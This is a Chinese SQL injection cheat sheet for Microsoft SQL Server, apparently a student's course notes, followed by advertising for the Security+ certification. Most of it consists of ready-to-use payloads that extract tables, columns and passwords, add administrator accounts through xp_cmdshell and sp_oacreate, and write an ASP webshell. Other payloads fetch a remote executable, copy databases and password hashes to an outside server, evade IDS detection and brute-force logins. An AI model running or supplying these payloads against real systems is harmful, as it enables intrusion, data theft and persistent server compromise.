最重要的表名:select * from sysobjectssysobjects ncsysobjectssysindexes tsysindexessyscolumnssystypessysuserssysdatabasessysxloginssysprocesses最重要的一些用户名(默认sql数据库中存在着的)publicdboguest(一般禁止,或者没权限)db_sercurityadminab_dlladmin一些默认扩展xp_regaddmultistringxp_regdeletekeyxp_regdeletevaluexp_regenumkeysxp_regenumvaluesxp_regreadxp_regremovemultistringxp_regwritexp_availablemedia 驱动器相关xp_dirtree 目录xp_enumdsn ODBC连接xp_loginconfig 服务器安全模式信息xp_makecab 创建压缩卷xp_ntsec_enumdomains domain信息xp_terminate_process 终端进程,给出一个PID例如:sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'exec xp_webserversp_dropextendedproc 'xp_webserver'bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar' group by users.id having 1=1-' group by users.id, users.username, users.password, users.privs having 1=1-'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-union select TOP 1 login_name FROM logintable-union select TOP 1 password FROM logintable where login_name='Rahul'--构造语句:查询是否存在xp_cmdshell' union select @@version,1,1,1--and 1=(select @@VERSION)and 'sa'=(select System_user)' union select ret,1,1,1 from foo--' union select min(username),1,1,1 from users where username > 'a'-' union select min(username),1,1,1 from users where username > 'admin'-' union select password,1,1,1 from users where username = 'admin'--and user_name()='dbo'and 0<>(select user_name()-; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5245886 /add'and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell');EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype='x'%20and%20name='xp_cmdshell')and 1=(select IS_SRVROLEMEMBER('sysadmin')) 判断sa权限是否and 0<>(select top 1 paths from newtable)-- 暴库大法and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)创建一个虚拟目录E盘:declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"'访问属性:(配合写入一个webshell)declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)依次提交 dbid = 7,8,9.... 得到更多的数据库名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 暴到一个表 假设为 adminand 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'and uid>(str(id))) 暴到UID的数值假设为18779569 uid=idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_idand 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in('id',...)) 来暴出其他的字段and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名依次可以得到密码。。。。。假设存在user_id username ,password 等字段Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from adminShow.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin(union语句到处风靡啊,access也好用暴库特殊技巧::%5c='\' 或者把/和\ 修改%5提交and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') 得到表名and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) 判断id值and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有字段http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[swap] ([swappass][char](255));--http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 swappass from swap)=1;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)http://61.131.96.39/PageShow.asp?TianName=政策法规&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";--得到了web路径d:\xxxx,接下来:http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str p_w_picpath);--传统的存在xp_cmdshell的测试过程:;exec master..xp_cmdshell 'dir';exec master.dbo.sp_addlogin hax;--;exec master.dbo.sp_password null,hax,hax;--;exec master.dbo.sp_addsrvrolemember hax sysadmin;--;exec master.dbo.xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--;exec master.dbo.xp_cmdshell 'net localgroup administrators hax /add';--exec master..xp_servicecontrol 'start', 'schedule'exec master..xp_servicecontrol 'start', 'server'http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user swap 5258 /add';DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net localgroup administrators swap/add'http://localhost/show.asp?id=1'; exec master..xp_cmdshell 'tftp -i youip get file.exe'-declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\';declare @a;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat'如果被限制则可以。select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec master.dbo.sp_addlogin hax')传统查询构造:select * FROM news where id=... AND topic=... AND .....admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'select 123;--;use master;--:a' or name like 'fff%';-- 显示有一个叫ffff的用户哈。'and 1<>(select count(email) from [user]);--;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--说明:上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。通过查看ffff的用户资料可得第一个用表叫ad然后根据表名ad得到这个表的IDffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--象下面这样就可以得到第二个表的名字了ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--exec master..xp_servicecontrol 'start', 'schedule'exec master..xp_servicecontrol 'start', 'server'sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'扩展存储就可以通过一般的方法调用:exec xp_webserver一旦这个扩展存储执行过,可以这样删除它:sp_dropextendedproc 'xp_webserver'insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-insert into users values( 667,123,123,0xffff)-insert into users values ( 123, 'admin''--', 'password', 0xffff)-;and user>0;;and (select count(*) from sysobjects)>0;;and (select count(*) from mysysobjects)>0 //为access数据库-----------------------------------------------------------通常注射的一些介绍:A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:select * from 表名 where 字段=49注入的参数为ID=49 And [查询条件],即是生成语句:select * from 表名 where 字段=49 And [查询条件](B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:select * from 表名 where 字段='连续剧'注入的参数为Class=连续剧' and [查询条件] and ''=' ,即是生成语句:select * from 表名 where 字段='连续剧' and [查询条件] and ''=''(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:select * from 表名 where 字段like '%关键字%'注入的参数为keyword=' and [查询条件] and '%25'=', 即是生成语句:select * from 表名 where字段like '%' and [查询条件] and '%'='%';;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0sysobjects是SQLServer的系统表,存储着所有的表名、视图、约束及其它对象,xtype='U' and status>0,表示用户建立的表名,上面的语句将第一个表名取出,与0比较大小,让报错信息把表名暴露出来。;;and (select Top 1 col_name(object_id('表名'),1) from sysobjects)>0从⑤拿到表名后,用object_id('表名')获取表名对应的内部ID,col_name(表名ID,1)代表该表的第1个字段名,将1换成2,3,4...就可以逐个获取所猜解表里面的字段名。post.htm内容:主要是方便输入。<iframe name=p src=# width=800 height=350 frameborder=0></iframe><br><form action=http://test.com/count.asp target=p><input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--" style="width:750"><input type=submit value=">>>"><input type=hidden name=fno value="2, 3"></form>枚举出他的数据表名:id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--这是将第一个表名更新到aaa的字段处。读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>'刚才得到的表名')。id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--然后id=1552 and exists(select * from aaa where aaa>5)读出第二个表,^^^^^^一个个的读出,直到没有为止。读字段是这样:id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),1));--然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名id=1552;update aaa set aaa=(select top 1 col_name(object_id('表名'),2));--然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名--------------------------------高级技巧:[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一个加一个]) [ where 条件]select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…)通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组][获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]update 表名 set 字段=(select top 1 col_name(object_id('要查询的数据表名'),字段列如:1) [ where 条件]绕过IDS的检测[使用变量]declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'1、 开启远程数据库基本语法select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )参数: (1) OLEDB Provider name2、 其中连接字符串参数可以是任何和端口用来连接,比如select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'要复制目标主机的整个数据库,首先要在目标主机上和自己机器上的数据库建立连接(如何在目标主机上建立远程连接,刚才已经讲了),之后insert所有远程表到本地表。基本语法:insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如:insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from table2insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysdatabases')select * from master.dbo.sysdatabasesinsert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysobjects')select * from user_database.dbo.sysobjectsinsert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _syscolumns')select * from user_database.dbo.syscolumns之后,便可以从本地数据库中看到目标主机的库结构,这已经易如反掌,不多讲,复制数据库:insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from database..table1insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table2') select * from database..table2......3、 复制哈西表(HASH)这实际上是上述复制数据库的一个扩展应用。登录密码的hash存储于sysxlogins中。方法如下:insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from database.dbo.sysxlogins得到hash之后,就可以进行暴力破解。这需要一点运气和大量时间。遍历目录的方法:先创建一个临时表:temp5';create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--5';insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器5';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构,并寸入temp表中5';insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看某个文件的内容5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--5';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--5';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc'5';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (xp_dirtree适用权限PUBLIC)写入表:语句1:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));--语句2:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));--语句3:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));--语句4:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--语句5:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));--语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));--语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER('db_owner'));--把路径写到表中去:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'c:\'-http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'e:\web'--语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-把数据库备份到网页目录:下载http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk='e:\web\down.bak';--and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)and%201=(select%20Top%201%20col_name(object_id('USER_LOGIN'),1)%20from%20sysobjects) 参看相关表。and 1=(select%20user_id%20from%20USER_LOGIN)and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)如果可以通过连接符注释掉后面的验证,那么就更有意思了,来看我们能作什么:a、在用户名位置输入【admin';exec master.dbo.sp_addlogin Cool;--】,添加一个sql用户b、在用户名位置输入【admin';exec master.dbo.sp_password null,123456,Cool;--】,给Cool设置密码为123456c、在用户名位置输入【admin';exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】,给Cool赋予System Administrator权限一些sql扩展xp_regaddmultistringxp_regdeletekey 删除键名xp_regdeletevalue 删除键值xp_regenumkeys 枚举xp_regenumvaluesxp_regread 对于xp_regremovemultistringxp_regwrite 写xp_availablemedia 查看驱动器xp_dirtree 看目录xp_enumdsn ODBC数据源xp_loginconfig 一些服务器安全配置的信息xp_makecab 打包,某些dbo权限先可做大用xp_ntsec_enumdomains 枚举域名相关信息xp_terminate_process 终端进程和ip啦xp_logininfo 当前登录帐号sp_configure 检索数据库中的内容(我觉得这个挺有用的)sp_helpextendedproc 得到所有的存储扩展sp_who2 查询用户,他们登录的主机,他们在数据库中执行的操作等等一些网络信息exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'SNMP辅助网络踩点exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'开始一些系统服务,比如telnet,前提希望可以跑来admin或者一些系统密码exec master..xp_servicecontrol 'start', 'schedule'exec master..xp_servicecontrol 'start', 'server'Sp_addextendedproc 'xp_webserver','c:\temp\xp_foo.dll' 此扩展可以运行程序使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。简单地创建这个表:create table foo( line varchar(8000) )然后执行bulk insert操作把文件中的数据插入到表中,如:bulk insert foo from 'c:\inetpub\wwwroot\admin\inc.asp'bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c -Slocalhost –Usa –Pfoobar'S'参数为执行查询的服务器,'U'参数为用户名,'P'参数为密码,这里为'foobar'SQL SERVER中提供了几个内置的允许创建ActiveX自动执行脚本的存储过程。这些脚本和运行在windows脚本解释器下的脚本,或者ASP脚本程序一样——他们使用VBScript或JavaScript书写,他们创建自动执行对象并和它们交互。一个自动执行脚本使用这种方法书写可以在Transact-SQL中做任何在ASP脚本中,或者WSH脚本中可以做的任何事情使用'wscript.shell'对象建立了一个记事本的实例:declare @o intexec sp_oacreate 'wscript.shell',@o outexec sp_oamethod @o,'run',NULL,'notepad.exe'指定在用户名后面来执行它:Username:'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'—使用FSO读一个已知的文本文件:declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1exec @ret = sp_oamethod @f, 'readline', @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_oamethod @f, 'readline', @line outend创建了一个能执行通过提交的命令,默认是asp那组权限的用户下运行,前提是sp_oacreate扩展存在declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out,'c:\inetpub\wwwroot\foo.asp', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'<% set o = server.createobject("wscript.shell"): o.run(request.querystring("cmd") ) %>'sp_who '1' select * from sysobjects针对局域网***,备份***或者非sa用户declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat ,name=test;--当前数据库就备份到你的硬盘上了select * from openrowset(sqloledb,myserver;sa;,select * from table) 回连,默认需要支持多语句查询添加登录,使其成为固定服务器角色的成员。语法sp_addsrvrolemember [ @loginame = ] 'login'[@rolename =] 'role'参数[@loginame =] 'login'是添加到固定服务器角色的登录名称。login 的数据类型为 sysname,没有默认值。login 可以是 Microsoft? SQL Server? 登录或 Microsoft Windows NT? 用户帐户。如果还没有对该 Windows NT 登录授予 SQL Server 访问权限,那么将自动对其授予访问权限。[@rolename =] 'role'要将登录添加到的固定服务器角色的名称。role 的数据类型为 sysname,默认值为 NULL,它必须是下列值之一:sysadminsecurityadminserveradminsetupadminprocessadmindiskadmindbcreatorbulkadmin返回代码值0(成功)或 1(失败)注释在将登录添加到固定服务器角色时,该登录就会得到与此固定服务器角色相关的权限。不能更改 sa 登录的角色成员资格。请使用 sp_addrolemember 将成员添加到固定数据库角色或用户定义的角色。不能在用户定义的事务内执行 sp_addsrvrolemember 存储过程。权限sysadmin 固定服务器的成员可以将成员添加到任何固定服务器角色。固定服务器角色的成员可以执行 sp_addsrvrolemember 将成员只添加到同一个固定服务器角色。示例下面的示例将 Windows NT 用户 Corporate\HelenS 添加到 sysadmin 固定服务器角色中。EXEC sp_addsrvrolemember 'Corporate\HelenS', 'sysadmin'OPENDATASOURCE不使用链接的服务器名,而提供特殊的连接信息,并将其作为四部分对象名的一部分。语法OPENDATASOURCE ( provider_name, init_string )参数provider_name注册为用于访问数据源的 OLE DB 提供程序的 PROGID 的名称。provider_name 的数据类型为 char,没有默认值。init_string连接字符串,这些字符串将要传递给目标提供程序的 IDataInitialize 接口。提供程序字符串语法是以关键字值对为基础的,这些关键字值对由分号隔开,例如:"keyword1=value; keyword2=value."在 Microsoft? Data Access SDK 中定义了基本语法。有关所支持的特定关键字值对的信息,请参见提供程序中的文档。下表列出 init_string 参数中最常用的关键字。关键字 OLE DB 属性 有效值和描述数据源 DBPROP_INIT_DATASOURCE 要连接的数据源的名称。不同的提供程序用不同的方法对此进行解释。对于 SQL Server OLE DB 提供程序来说,这会指明服务器的名称。对于 Jet OLE DB 提供程序来说,这会指明 .mdb 文件或 .xls 文件的完整路径。位置 DBPROP_INIT_LOCATION 要连接的数据库的位置。扩展属性 DBPROP_INIT_PROVIDERSTRING 提供程序特定的连接字符串。连接超时 DBPROP_INIT_TIMEOUT 超时值,在该超时值后,连接尝试将失败。用户 ID DBPROP_AUTH_USERID 用于该连接的用户 ID。密码 DBPROP_AUTH_PASSWORD 用于该连接的密码。目录 DBPROP_INIT_CATALOG 连接到数据源时的初始或默认的目录名称。OPENDATASOURCE 函数可以在能够使用链接服务器名的相同 Transact-SQL 语法位置中使用。因此,就可以将 OPENDATASOURCE 用作四部分名称的第一部分,该名称指的是 SELECT、INSERT、UPDATE 或 DELETE 语句中的表或视图的名称;或者指的是 EXECUTE 语句中的远程存储过程。当执行远程存储过程时,OPENDATASOURCE 应该指的是另一个 SQL Server。OPENDATASOURCE 不接受参数变量。与 OPENROWSET 函数类似,OPENDATASOURCE 应该只引用那些不经常访问的 OLE DB 数据源。对于访问次数稍多的任何数据源,请为它们定义链接的服务器。无论 OPENDATASOURCE 还是 OPENROWSET 都不能提供链接的服务器定义的全部功能,例如,安全管理以及查询目录信息的能力。每次调用 OPENDATASOURCE 时,都必须提供所有的连接信息(包括密码)。示例下面的示例访问来自某个表的数据,该表在 SQL Server 的另一个实例中。SELECT *FROM OPENDATASOURCE('SQLOLEDB','Data Source=ServerName;User ID=MyUID;Password=MyPass').Northwind.dbo.Categories下面是个查询的示例,它通过用于 Jet 的 OLE DB 提供程序查询 Excel 电子表格。SELECT *FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0','Data Source="c:\Finance\account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions针对MSDASQL 用存储过程建立的sql连接,在blackbox测试中,好象没什么注入区别declare @username nvarchar(4000), @query nvarchar(4000)declare @pwd nvarchar(4000), @char_set nvarchar(4000)declare @pwd_len int, @i int, @c charselect @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_'select @pwd_len = 8select @username = 'sa'while @i < @pwd_len begin-- make pwd(code deleted)-- try a loginselect @query = N'select * fromOPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username +N';pwd=' + @pwd + N''',''select @@version'')'exec xp_execresultset @query, N'master'--check for success(code deleted)-- increment the password(code deleted)end盲注技巧之一,时间延缓(可以加一个循环函数,运行查询时间越久说说明当前字段正确)if (select user) = 'sa' waitfor delay '0:0:5'if exists (select * from pubs..pub_info) waitfor delay '0:0:5'create table pubs..tmp_file (is_file int, is_dir int, has_parent int)insert into pubs..tmp_file exec master..xp_fileexist 'c:\boot.ini'if exists (select * from pubs..tmp_file) waitfor delay '0:0:5'if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5'字符对比if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfordelay '0:0:5'declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5'declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s,1, 1)) & ( power(2, 1))) > 0 waitfor delay '0:0:5'编码的秘密,饶过IDSdeclare @q varchar(8000)select @q = 0x73656c65637420404076657273696f6eexec(@q)This runs 'select @@version', as does:declare @q nvarchar(4000)select @q =0x730065006c00650063007400200040004000760065007200730069006f006e00exec(@q)In the stored procedure example above we saw how a 'sysname' parameter can containmultiple SQL statements without the use of single quotes or semicolons:sp_msdropretry [foo drop table logs select * from sysobjects], [bar]
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。